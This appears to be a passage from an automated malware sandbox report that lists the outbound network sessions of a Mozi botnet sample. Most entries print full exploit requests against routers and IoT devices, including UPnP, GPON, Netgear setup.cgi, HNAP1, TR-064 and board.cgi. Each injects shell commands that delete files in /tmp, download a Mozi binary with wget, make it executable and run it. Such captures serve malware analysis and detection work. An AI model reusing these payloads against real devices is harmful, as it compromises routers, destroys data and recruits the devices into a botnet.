                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              21192.168.2.2348458100.184.144.1148080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263309002 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              22192.168.2.2341714113.229.7.21380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263329983 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              23192.168.2.234290684.2.80.5752869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263355970 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              24192.168.2.234044021.244.144.8680
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263376951 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              25192.168.2.2350400216.18.254.1618080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263384104 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              26192.168.2.2354856167.151.164.417574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263412952 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              27192.168.2.234181287.116.84.1528080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263428926 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              28192.168.2.2347372162.33.207.20552869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263468981 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              29192.168.2.233714260.29.245.14980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263501883 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 60.29.245.149:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              30192.168.2.2356902194.213.146.3952869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263523102 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              31192.168.2.236074828.144.199.558080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263545036 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              32192.168.2.2355318222.76.197.12180
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263577938 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 222.76.197.121:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              33192.168.2.2351548182.98.49.248080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263596058 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              34192.168.2.2351398210.181.40.1428080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263618946 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              35192.168.2.234553642.242.241.3380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263643026 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 42.242.241.33:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              36192.168.2.2339232106.44.250.268080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263663054 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              37192.168.2.2358104121.136.2.4937215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263699055 CET820OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 121.136.2.49:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
